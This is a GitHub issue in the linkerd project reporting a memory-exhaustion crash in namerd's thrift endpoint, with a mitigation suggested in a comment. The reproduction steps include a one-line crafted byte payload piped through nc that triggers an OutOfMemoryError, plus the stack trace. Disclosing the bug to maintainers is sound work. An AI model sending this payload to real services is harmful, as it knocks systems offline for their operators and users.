### ISSUE TITLE
namerd fails with OutOfMemoryError on specially crafted request to thrift endpoint

### ISSUE THREAD

**Issue by edio** [linkerd/linkerd#1524]
STR:
1. prepare simple config
```
$ cat namerd.yaml
storage:
  kind: io.l5d.inMemory
interfaces:
- kind: io.l5d.thriftNameInterpreter
  port: 4100
```
2. run namerd
```
$ export JVM_OPTIONS="-Xmx1024m"
$ ./namerd-1.1.2-exec namerd.yaml
```
3. send request
```
$ echo -n -e \\x00\\x00\\x00\\x08\\x4e\\x49\\x5f\\x50\\x49\\x4e\\x47\\x00 | nc localhost 4100
```

AR:
namerd fails with OutOfMemoryError and following stacktrace
```
java.lang.OutOfMemoryError: Java heap space
        at org.apache.thrift.protocol.TBinaryProtocol.readStringBody(TBinaryProtocol.java:360)
        at org.apache.thrift.protocol.TBinaryProtocol.readMessageBegin(TBinaryProtocol.java:221)
        at com.twitter.finagle.thriftmux.ThriftEmulator$Emulator.liftedTree1$1(ThriftEmulator.scala:159)
        at com.twitter.finagle.thriftmux.ThriftEmulator$Emulator.<init>(ThriftEmulator.scala:155)
        at com.twitter.finagle.thriftmux.ThriftEmulator$Init.$anonfun$read$1(ThriftEmulator.scala:125)
        at com.twitter.finagle.thriftmux.ThriftEmulator$Init$$Lambda$777/835600625.apply(Unknown Source)
        at com.twitter.util.Future.$anonfun$flatMap$1(Future.scala:1129)
        at com.twitter.util.Future$$Lambda$776/149309490.apply(Unknown Source)
        at com.twitter.util.Promise$Transformer.liftedTree1$1(Promise.scala:226)
        at com.twitter.util.Promise$Transformer.k(Promise.scala:226)
        at com.twitter.util.Promise$Transformer.apply(Promise.scala:236)
        at com.twitter.util.Promise$Transformer.apply(Promise.scala:217)
        at com.twitter.util.Promise$$anon$7.run(Promise.scala:530)
        at com.twitter.concurrent.LocalScheduler$Activation.run(Scheduler.scala:200)
        at com.twitter.concurrent.LocalScheduler$Activation.submit(Scheduler.scala:158)
        at com.twitter.concurrent.LocalScheduler.submit(Scheduler.scala:272)
        at com.twitter.concurrent.Scheduler$.submit(Scheduler.scala:108)
        at com.twitter.util.Promise.runq(Promise.scala:520)
        at com.twitter.util.Promise.updateIfEmpty(Promise.scala:883)
        at com.twitter.util.Promise.update(Promise.scala:857)
        at com.twitter.util.Promise.setValue(Promise.scala:833)
        at com.twitter.concurrent.AsyncQueue.offer(AsyncQueue.scala:123)
        at com.twitter.finagle.netty4.transport.ChannelTransport$$anon$1.channelRead(ChannelTransport.scala:181)
        at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
        at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
        at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
        at io.netty.channel.ChannelInboundHandlerAdapter.channelRead(ChannelInboundHandlerAdapter.java:86)
        at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
        at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
        at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
        at io.netty.channel.ChannelInboundHandlerAdapter.channelRead(ChannelInboundHandlerAdapter.java:86)
        at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
```

The issue, is that this request appears to be a valid thrift message from finagle point of view, and it says, that there's a string of `4e 49 5f 50` bytes long (which is roughly 1.2 GB)

Let me know, if any additional details are required

**Comment by edio** [comment]
While looking through sources, I found, that it is possible to effectively fix the issue just by setting `org.apache.thrift.readLength` environment variable

Something like
```
export JVM_OPTIONS="$JVM_OPTIONS -Dorg.apache.thrift.readLength=$RD_LENGTH_BYTES"
```
